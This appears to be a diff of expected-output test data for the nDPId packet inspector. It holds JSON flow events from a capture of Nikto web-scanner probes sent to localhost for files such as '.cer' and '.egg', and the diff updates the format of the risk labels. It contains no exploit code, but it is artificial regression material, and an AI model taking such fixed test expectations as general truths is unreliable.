 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277096,"pkt":"AAAAAAAAAAAAAAAACABFAADCcsRAAEAGyW9\/AAABfwAAAcOuH5Drmkq5YpvrhoAYAED+tgAAAQEICp1m\/JCdZvyQR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277098,"pkt":"AAAAAAAAAAAAAAAACABFAADCRRhAAEAG9xt\/AAABfwAAAcOwH5DRhn1t\/ojAOIAYAED+tgAAAQEICp1m\/JGdZvyRR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277100,"pkt":"AAAAAAAAAAAAAAAACABFAAC931JAAEAGXOZ\/AAABfwAAAcOyH5BYxOcsixzBAIAYAED+sQAAAQEICp1m\/JSdZvyUR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277106,"pkt":"AAAAAAAAAAAAAAAACABFAAC9aFtAAEAG091\/AAABfwAAAcO0H5ATAFAmoohjQYAYAED+sQAAAQEICp1m\/JqdZvyaR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277109,"pkt":"AAAAAAAAAAAAAAAACABFAADFvlhAAEAGfdh\/AAABfwAAAcO2H5BO24YshrKR94AYAED+uQAAAQEICp1m\/J2dZvydR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277113,"pkt":"AAAAAAAAAAAAAAAACABFAADF+v9AAEAGQTF\/AAABfwAAAcO4H5AzScKEmziDBYAYAED+uQAAAQEICp1m\/KGdZvyhR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277115,"pkt":"AAAAAAAAAAAAAAAACABFAADAxXJAAEAGdsN\/AAABfwAAAcO6H5BPqv0Pb+YcGYAYAED+tAAAAQEICp1m\/KOdZvyjR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277116,"pkt":"AAAAAAAAAAAAAAAACABFAADAsDlAAEAGi\/x\/AAABfwAAAcO8H5B5M4hJ8rxYu4AYAED+tAAAAQEICp1m\/KSdZvykR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
